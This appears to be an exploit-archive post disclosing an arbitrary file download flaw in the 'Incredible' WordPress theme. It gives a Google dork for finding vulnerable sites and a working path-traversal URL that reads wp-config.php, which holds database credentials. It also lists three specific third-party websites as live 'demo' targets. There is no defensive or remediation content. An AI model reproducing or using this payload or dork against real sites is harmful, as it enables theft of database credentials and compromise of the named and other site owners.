facebook facebook twitter rss

wordpress Incredible - Responsive Arbitrary File Download Vulnerability

Author: JOK3R , Published: 19-02-2015
# Exploit Title: wordpress Incredible - Responsive Arbitrary File Download Vulnerability
# Date: 17/02/2015
# Exploit Author: JOK3R
# Vendor Homepage: http://themeforest.net/item/incredible-responsive-wordpress-theme/3016398
# Contact :
#Y!D : n4tw0rk@yahoo.com
#Skype : Master_jok3r
# Tested on: Kali linux / Windows 8.1
# Google Dork: index of /wp-content/themes/incrediblewp/
######################
# PoC
http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#Demo :
#http://www.pacificgenetech.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
#http://sunflowergroup.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
#www.spoedtandartsdenhaag.net/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
#
##########################################
# Spc Thanks : Mohamad Nofozi - sheytan azzam - Alireza promis - Mr moein - root3r - sina lizard - kamral hellish -mr mahkoom And All iranian Hacker's And Exploiter"s
###########################################

Like us on Facebook :